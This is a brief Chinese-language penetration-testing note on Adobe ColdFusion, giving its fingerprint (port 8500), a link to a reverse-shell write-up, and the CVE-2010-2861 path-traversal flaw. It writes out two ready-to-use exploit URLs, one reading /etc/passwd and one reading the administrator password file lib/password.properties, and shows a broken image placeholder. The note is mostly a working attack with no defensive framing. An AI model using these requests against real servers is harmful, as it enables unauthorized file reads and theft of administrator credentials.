adobe coldfusion特征
1、8500端口
2、如图所示
验证和反弹shell都有
https://idc.wanyunshuju.com/aqld/2076.html
第二个漏洞
CVE-2010-2861文件包含漏洞
直接访问`http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en`,即可读取文件`/etc/passwd`:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kuloRacE-1631534520188)(1.png)]
读取后台管理员密码`http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en`: